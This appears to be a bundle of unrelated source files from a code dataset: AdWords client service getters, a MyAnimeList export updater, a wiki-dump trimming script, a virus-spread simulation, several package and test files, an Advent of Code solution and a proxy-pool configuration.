          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to CreateAccountService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
      # This service exists only in some API versions; check in strict mode.
      AdWordsSanityCheck.ValidateService('CreateAccountService', api_version)
    # CreateAccountService lives in the 'mcm' URL group.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'mcm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'CreateAccountService')
def GetConstantDataService(self, server='https://adwords.google.com',
                           version=None, http_proxy=None):
    """Return a service client for the AdWords ConstantDataService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to ConstantDataService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'ConstantDataService')
def GetCustomerService(self, server='https://adwords.google.com',
                       version=None, http_proxy=None):
    """Return a service client for the AdWords CustomerService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to CustomerService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # CustomerService lives in the 'mcm' URL group.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'mcm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger, 'CustomerService')
def GetCustomerSyncService(self, server='https://adwords.google.com',
                           version=None, http_proxy=None):
    """Return a service client for the AdWords CustomerSyncService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to CustomerSyncService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # CustomerSyncService lives in the 'ch' (change history) URL group.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'ch',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'CustomerSyncService')
def GetExperimentService(self, server='https://adwords.google.com',
                         version=None, http_proxy=None):
    """Return a service client for the AdWords ExperimentService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to ExperimentService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'ExperimentService')
def GetGeoLocationService(self, server='https://adwords.google.com',
                          version=None, http_proxy=None):
    """Return a service client for the AdWords GeoLocationService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to GeoLocationService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'GeoLocationService')
def GetInfoService(self, server='https://adwords.google.com', version=None,
                   http_proxy=None):
    """Return a service client for the AdWords InfoService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to InfoService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # InfoService lives in its own 'info' URL group.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'info',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger, 'InfoService')
def GetLocationCriterionService(self, server='https://adwords.google.com',
                                version=None, http_proxy=None):
    """Return a service client for the AdWords LocationCriterionService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to LocationCriterionService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'LocationCriterionService')
def GetManagedCustomerService(self, server='https://adwords.google.com',
                              version=None, http_proxy=None):
    """Return a service client for the AdWords ManagedCustomerService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to ManagedCustomerService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # ManagedCustomerService lives in the 'mcm' URL group.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'mcm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'ManagedCustomerService')
def GetMediaService(self, server='https://adwords.google.com', version=None,
                    http_proxy=None):
    """Return a service client for the AdWords MediaService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to MediaService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger, 'MediaService')
def GetReportDefinitionService(self, server='https://adwords.google.com',
                               version=None, http_proxy=None):
    """Return a service client for the AdWords ReportDefinitionService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to ReportDefinitionService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'ReportDefinitionService')
def GetReportDownloader(self, server='https://adwords.google.com',
                        version=None, http_proxy=None):
    """Return a ReportDownloader used to download AdWords reports.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      ReportDownloader: helper object for fetching report data.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    # Unlike the SOAP services, the downloader takes no shared lock.
    return ReportDownloader(auth_headers, self._config, op_config,
                            self.__logger)
def GetServicedAccountService(self, server='https://adwords.google.com',
                              version=None, http_proxy=None):
    """Return a service client for the AdWords ServicedAccountService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to ServicedAccountService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
      # This service exists only in some API versions; check in strict mode.
      AdWordsSanityCheck.ValidateService('ServicedAccountService', api_version)
    # ServicedAccountService lives in the 'mcm' URL group.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'mcm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'ServicedAccountService')
def GetTargetingIdeaService(self, server='https://adwords.google.com',
                            version=None, http_proxy=None):
    """Return a service client for the AdWords TargetingIdeaService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to TargetingIdeaService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # TargetingIdeaService lives in the 'o' (optimization) URL group.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'o',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'TargetingIdeaService')
def GetTrafficEstimatorService(self, server='https://adwords.google.com',
                               version=None, http_proxy=None):
    """Return a service client for the AdWords TrafficEstimatorService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to TrafficEstimatorService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # TrafficEstimatorService lives in the 'o' (optimization) URL group.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'o',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'TrafficEstimatorService')
def GetUserListService(self, server='https://adwords.google.com',
                       version=None, http_proxy=None):
    """Return a service client for the AdWords UserListService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to UserListService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger, 'UserListService')
def GetConversionTrackerService(self, server='https://adwords.google.com',
                                version=None, http_proxy=None):
    """Return a service client for the AdWords ConversionTrackerService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to ConversionTrackerService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger,
                                 'ConversionTrackerService')
def GetDataService(self, server='https://adwords.google.com',
                   version=None, http_proxy=None):
    """Return a service client for the AdWords DataService.

    Args:
      server: str API server to access. Defaults to the live site; use
          'https://adwords-sandbox.google.com' to hit the sandbox.
      version: str API version to use; falls back to DEFAULT_API_VERSION.
      http_proxy: str HTTP proxy to route requests through, if any.

    Returns:
      GenericAdWordsService: client bound to DataService.
    """
    auth_headers = self.__GetAuthCredentialsForAccessLevel()
    api_version = DEFAULT_API_VERSION if version is None else version
    if Utils.BoolTypeConvert(self._config['strict']):
      AdWordsSanityCheck.ValidateServer(server, api_version)
    # Per-call configuration handed to the generic service wrapper.
    op_config = {
        'server': server,
        'version': api_version,
        'group': 'cm',
        'default_group': 'cm',
        'http_proxy': http_proxy
    }
    return GenericAdWordsService(auth_headers, self._config, op_config,
                                 self.__lock, self.__logger, 'DataService')
def _GetOAuthScope(self, server='https://adwords.google.com'):
    """Return the full OAuth scope URL for the given API server.

    Args:
      server: str API server the scope applies to; defaults to the live site.

    Returns:
      str: the OAuth scope, i.e. the server URL with '/api/adwords/' appended.
    """
    return '%s/api/adwords/' % server
| StarcoderdataPython |
1788788 | <gh_stars>0
"""
This script adds a missing "duration" field for every anime in the list retrieved via official myanimelist export api(https://myanimelist.net/panel.php?go=export)
"""
import sys
from typing import Optional
import xml.etree.ElementTree as ET
from mal import Anime
def get_duration(anime_id: int) -> Optional[str]:
    """Return the episode duration string for the anime with the given MAL id.

    Args:
        anime_id: MyAnimeList anime id (fixes the original's `amime_id` typo;
            the only caller in this script passes it positionally).

    Returns:
        The duration reported by the MAL API, or None when unavailable.
    """
    return Anime(anime_id).duration
def modify(path: str):
    """Insert a <duration> element into every <anime> entry of a MAL export.

    Parses the XML file at *path*, queries the MAL API for each anime's
    episode duration, inserts it as a child element, and overwrites the
    file in place. Entries whose lookup fails are skipped with a message.
    """
    tree = ET.parse(path)
    root = tree.getroot()
    counter = 0
    # Progress denominator counts ALL children of the root, not only <anime>
    # elements — presumably they are the vast majority; verify against a
    # real export if exact progress numbers matter.
    global_len = len(root)
    for element in root:
        if element.tag == "anime":
            counter += 1
            try:
                duration: str = get_duration(int(element.find("series_animedb_id").text))
            except Exception as e:
                # Best-effort: a failed API lookup skips this entry only.
                print("Exception while updating %d/%d - %s -> %s" % (counter, global_len, element.find("series_title").text, e))
                continue
            duration_element = ET.Element("duration")
            duration_element.text = duration
            # Tail keeps the pretty-printed layout of the exported XML.
            duration_element.tail = "\n    "
            # Insert right after the id element so field order stays tidy.
            element.insert(1, duration_element)
            print("Updating %d/%d - %s -> %s" % (counter, global_len, element.find("series_title").text, duration))
    tree.write(path, encoding="utf-8", xml_declaration=True)
    print("Overwrite is successful: %s" % path)
# CLI entry point: expects the path to the exported XML file as argv[1].
if __name__ == "__main__":
    modify(sys.argv[1])
    print("Work is done!")
| StarcoderdataPython |
#!/usr/bin/env bash
# This script trims wiki dumps into only relevant information.
# The output is:
# - results/pages_trimmed containing page id, namespace, title
# - results/links_trimmed containing page id (from), namespace, title (to)
# This should be further parsed by parse_and_save to construct edges as
# (src id, dst id) which can be parsed and partitioned into partitions and
# disjoint logical data objects.
# Author: <NAME>
#
# Usage: trim.sh <pages-dump.sql> <links-dump.sql>
echo "Pages file is $1"
echo "Links file is $2"

RDIR=result/trim
mkdir -p "${RDIR}"

echo ""
echo "Trimming pages ..."
# Quote the positional args and output paths so file names containing
# whitespace or glob characters do not break word splitting.
grep INSERT "$1" > "${RDIR}/pages"
echo "Done trimming pages"

echo ""
echo "Trimming links ..."
grep INSERT "$2" > "${RDIR}/links"
echo "Done trimming links"
| StarcoderdataPython |
from model import *
import matplotlib.pyplot as plt

# Build a small virus-spread network model; parameters are the infection,
# recovery and resistance rates (alpha/beta/gamma) used by VirusModel.
model = VirusModel(num_nodes=10, avg_node_degree=2, initial_outbreak_size=1, alpha=0.05, beta=0.05, gamma=0.03)

# Run the simulation for a fixed number of steps. Alternative stopping rule
# (run until the outbreak dies out):
#   while number_infected(model) > 0:
#       model.step()
for _ in range(10):
    model.step()

# Plot every model-level series collected by the DataCollector.
df = model.datacollector.get_model_vars_dataframe()
df.plot()
plt.xlabel('Time (Days)')
plt.ylabel('Number of Individuals')
plt.show()
3237638 | """Connections to ADODB data sources from Kukur.
This requires an installation of pywin32 (LGPL).
"""
# SPDX-FileCopyrightText: 2021 Timeseer.AI
# SPDX-License-Identifier: Apache-2.0
# pywin32's adodbapi is an optional, Windows-only dependency. Record its
# availability here; construction of an ADODB source raises a clear error
# later (ADODBNotInstalledError) instead of failing at import time.
try:
    import adodbapi

    HAS_ADODB = True
except ImportError:
    HAS_ADODB = False
from kukur.source.metadata import MetadataValueMapper
from kukur.source.quality import QualityMapper
from kukur.source.sql import BaseSQLSource, SQLConfig
class ADODBNotInstalledError(Exception):
    """Raised when the adodbapi module of pywin32 is not available."""

    def __init__(self):
        # Message fixes the original's grammar ("modules is" -> "module is")
        # and tells the user how to resolve the problem.
        super().__init__(
            "the adodbapi module is not available. Install pywin32."
        )
def from_config(
    data, metadata_value_mapper: MetadataValueMapper, quality_mapper: QualityMapper
):
    """Build an ADODB data source from a configuration dictionary.

    Raises ADODBNotInstalledError when the adodbapi module is not available.
    """
    if not HAS_ADODB:
        raise ADODBNotInstalledError()
    return ADODBSource(
        SQLConfig.from_dict(data), metadata_value_mapper, quality_mapper
    )
class ADODBSource(BaseSQLSource):
    """An ADODB data source.

    Reads time series data from any source reachable through an ADODB
    connection string (Windows only, via pywin32's adodbapi module).
    """

    def __init__(
        self,
        config: SQLConfig,
        metadata_value_mapper: MetadataValueMapper,
        quality_mapper: QualityMapper,
    ):
        """Initialize the base SQL source and verify adodbapi is importable.

        Raises ADODBNotInstalledError when pywin32 is missing.
        """
        super().__init__(config, metadata_value_mapper, quality_mapper)
        if not HAS_ADODB:
            raise ADODBNotInstalledError()

    def connect(self):
        """Open a new ADODB connection using the configured connection string."""
        return adodbapi.connect(self._config.connection_string)
| StarcoderdataPython |
12482 | #!/usr/bin/env python
from argparse import ArgumentParser
import sys
from comp_pi import compute_pi
def main():
    """Parse the sample count from argv and print a pi estimate.

    Returns 0 so the caller can pass the value straight to sys.exit().
    """
    arg_parser = ArgumentParser(description='compute pi using Fortran '
                                'function')
    # type=int: without it argparse passes a *string* to compute_pi whenever
    # the argument is given on the command line (only the default was an int).
    arg_parser.add_argument('n', type=int, default=1000, nargs='?',
                            help='number of random points')
    options = arg_parser.parse_args()
    print(compute_pi(options.n))
    return 0
if __name__ == '__main__':
    # Propagate main()'s return value directly as the process exit status.
    sys.exit(main())
| StarcoderdataPython |
1617814 | <reponame>BenWibking/spack
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class TreeSitter(MakefilePackage):
    """Tree-sitter is a parser generator tool and an incremental parsing library.
    It can build a concrete syntax tree for a source file and
    efficiently update the syntax tree as the source file is edited."""
    homepage = "https://tree-sitter.github.io/tree-sitter/"
    url = "https://github.com/tree-sitter/tree-sitter/archive/refs/tags/v0.20.1.tar.gz"
    maintainers = ['albestro']
    version('0.20.1', sha256='12a3f7206af3028dbe8a0de50d8ebd6d7010bf762db918acae76fc7585f1258d')
    def edit(self, spec, prefix):
        # MakefilePackage configuration hook: the tree-sitter Makefile honors
        # PREFIX, so exporting it is the only configuration needed.  `env`
        # presumably comes from `from spack import *` (build environment
        # mapping) -- confirm against spack's MakefilePackage docs.
        env['PREFIX'] = prefix
| StarcoderdataPython |
4809431 | import os
import textwrap
from dvc.main import main
def test_cache_dir_local(tmp_dir, dvc, capsys, caplog):
    """`dvc cache dir` resolves a dir set only in the *local* config file."""
    # Write cache.dir into .dvc/config.local (not the shared .dvc/config).
    (tmp_dir / ".dvc" / "config.local").write_text(
        textwrap.dedent(
            """\
            [cache]
                dir = some/path
            """
        )
    )
    path = os.path.join(dvc.dvc_dir, "some", "path")
    # --local reads config.local, so the configured path must be printed.
    assert main(["cache", "dir", "--local"]) == 0
    out, _ = capsys.readouterr()
    assert path in out
    # The merged (default) view also resolves to the same path.
    assert main(["cache", "dir"]) == 0
    out, _ = capsys.readouterr()
    assert path in out
    # --project looks only at .dvc/config, which has no cache.dir entry:
    # expect exit code 251 and an explanatory error in the log.
    assert main(["cache", "dir", "--project"]) == 251
    assert "option 'dir' doesn't exist in section 'cache'" in caplog.text
| StarcoderdataPython |
53982 | <filename>spinner.py
#!/usr/bin/python
import sys, time
# Animate a waving stick figure forever, redrawing the same terminal line
# by rewinding with a carriage return before each frame.
while True:
    for frame in ('\o/', '\o>', '<o>', '<o/'):
        sys.stdout.write('\r%s' % frame)
        sys.stdout.flush()
        time.sleep(0.1)
| StarcoderdataPython |
4842895 | # -*- coding: utf-8 -*-
from random import randint, random
import numpy as np
from npstreams import idot, itensordot, iinner, ieinsum, last
import pytest
def test_idot_against_numpy_multidot():
    """Streaming idot must match numpy.linalg.multi_dot on a 2D chain."""
    matrices = [np.random.random((8, 8)) for _ in range(7)]
    expected = np.linalg.multi_dot(matrices)
    result = last(idot(matrices))
    assert expected.shape == result.shape
    assert np.allclose(expected, result)
@pytest.mark.parametrize("axis", (0, 1, 2))
def test_itensordot_against_numpy_tensordot(axis):
    """Test against numpy.tensordot in 2D case"""
    # NOTE(review): `axis` is parametrized but never used in the body, so the
    # three runs are identical.  Either pass it through to tensordot/itensordot
    # or drop the parametrize -- verify the original intent.
    stream = tuple(np.random.random((8, 8)) for _ in range(2))
    from_numpy = np.tensordot(*stream)
    from_stream = last(itensordot(stream))
    assert from_numpy.shape == from_stream.shape
    assert np.allclose(from_numpy, from_stream)
@pytest.mark.parametrize("axis", (0, 1, 2))
def test_iinner_against_numpy_inner(axis):
    """Test against numpy.inner in 2D case"""
    # NOTE(review): as in test_itensordot, the parametrized `axis` is unused,
    # so all three runs are identical -- verify intent.
    stream = tuple(np.random.random((8, 8)) for _ in range(2))
    from_numpy = np.inner(*stream)
    from_stream = last(iinner(stream))
    assert from_numpy.shape == from_stream.shape
    assert np.allclose(from_numpy, from_stream)
def test_ieinsum_against_numpy_einsum():
    """Streaming ieinsum must match numpy.einsum for a two-operand contraction."""
    first = np.arange(60.0).reshape(3, 4, 5)
    second = np.arange(24.0).reshape(4, 3, 2)
    expected = np.einsum("ijk,jil->kl", first, second)
    result = last(ieinsum([first, second], "ijk,jil->kl"))
    assert expected.shape == result.shape
    assert np.allclose(expected, result)
| StarcoderdataPython |
1681856 | <reponame>zzl0/aoc
from utils import *
@dataclass
class Password:
    """One policy line from the day-2 puzzle: two numbers, a letter, a password."""
    first: int
    second: int
    char: str
    password: str

    @classmethod
    def of(cls, s):
        """Parse a line such as '1-3 b: cdefg' into a Password instance."""
        # '1-3 b: cdefg' -> ('1', '3', 'b', 'cdefg')
        low, high, letter, pwd = re.findall(r'[^-:\s]+', s)
        return cls(int(low), int(high), letter, pwd)

    def isValid1(self) -> bool:
        """Policy 1: the letter's count lies within [first, second]."""
        occurrences = self.password.count(self.char)
        return self.first <= occurrences <= self.second

    def isValid2(self) -> bool:
        """Policy 2: the letter appears at exactly one of the two 1-based positions."""
        at_first = self.password[self.first - 1] == self.char
        at_second = self.password[self.second - 1] == self.char
        return at_first != at_second
def day2_1(passwords: List[Password]) -> int:
    """Count how many passwords satisfy the first (count-based) policy."""
    return sum(1 for p in passwords if p.isValid1())
def day2_2(passwords: List[Password]) -> int:
    """Count how many passwords satisfy the second (position-based) policy."""
    return sum(1 for p in passwords if p.isValid2())
if __name__ == "__main__":
    # `data` comes from the star import of utils; presumably it loads the
    # day-2 puzzle input and parses each line with Password.of -- confirm.
    passwords = data(2, Password.of)
    print(f'day2_1: {day2_1(passwords)}')
    print(f'day2_2: {day2_2(passwords)}')
    # Expected answers for the author's puzzle input:
    # day2_1: 418
    # day2_2: 616
| StarcoderdataPython |
1736577 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author: <NAME>
#
# This file is part of Mini Proxy Pool
#
# This program is free software and it is distributed under
# the terms of the MIT license. Please see LICENSE file for details.
# File used to persist discovered proxies between runs.
PROXY_DB_FILE = "_proxies.db"
# How long a proxy may take to answer before it is treated as dead.
VALIDATOR_TIMEOUT = 1 # seconds
# URL fetched through each proxy to decide whether the proxy works.
VALIDATOR_URL = "http://www.google.ca"
VALIDATOR_THREAD_POOL_SIZE = 20
VALIDATOR_CONNECTIONS_PER_THREAD = 20
INVALID_PROXY_TIMES = 5 # if a proxy cannot be connected INVALID_PROXY_TIMES times in a row, it is defined as invalid
# Whether proxies marked invalid are deleted outright (vs. only flagged).
INVALID_PROXY_IF_DELETE = True
VALIDATE_THREAD_RUN_PERIOD = 5 * 60 # seconds wait after each validation
# NOTE(review): "PORXIES" is a typo, but renaming would break importers.
LOAD_PORXIES_FROM_SOURCES_THREAD_RUN_PERIOD = 30 * 60 # seconds wait after each loading from sites
# Bind address/port for the REST API serving the proxy list.
REST_SRV_IP = "0.0.0.0"
REST_SRV_PORT = 9876
REST_API_PATH_GET_ALL_VALID = "/api/v1/proxies/*"
# Free proxy sites: each entry gives a page URL, a regex that scrapes
# ip/port(/protocol) tuples, and which regex groups hold each field.
PROXY_SOURCE_SITES = [
    {
        'url_base': "https://free-proxy-list.net",
        'pattern': "((?:\d{1,3}\.){1,3}\d{1,3})<\/td><td>(\d{1,6})(.{1,200})<td class='hx'>(.{2,3})",
        'ip_ind': 0,
        'port_ind': 1,
        'protocal_ind': 3
    },
    {
        'url_base': 'https://www.us-proxy.org',
        'pattern': "((?:\d{1,3}\.){1,3}\d{1,3})<\/td><td>(\d{1,6})(.{1,200})<td class='hx'>(.{2,3})",
        'ip_ind': 0,
        'port_ind': 1,
        'protocal_ind': 3 # todo: to specify the protocol: http or https
    },
    {
        'url_base': "http://spys.me/proxy.txt",
        'pattern': '((?:\d{1,3}\.){1,3}\d{1,3}):(\d{1,6})',
        'ip_ind': 0,
        'port_ind': 1,
        'protocal_ind': None
    }
]
# Local text files listed as additional proxy sources (one proxy per line,
# presumably -- confirm against the loader).
PROXY_SOURCE_FILES = [
    'custom_proxies_list.txt'
]
# Browser-like HTTP headers; presumably sent when scraping the source sites.
DEFAULT_HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2693.2 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Connection': 'keep-alive',
    'Accept-Encoding': 'gzip, default',
}
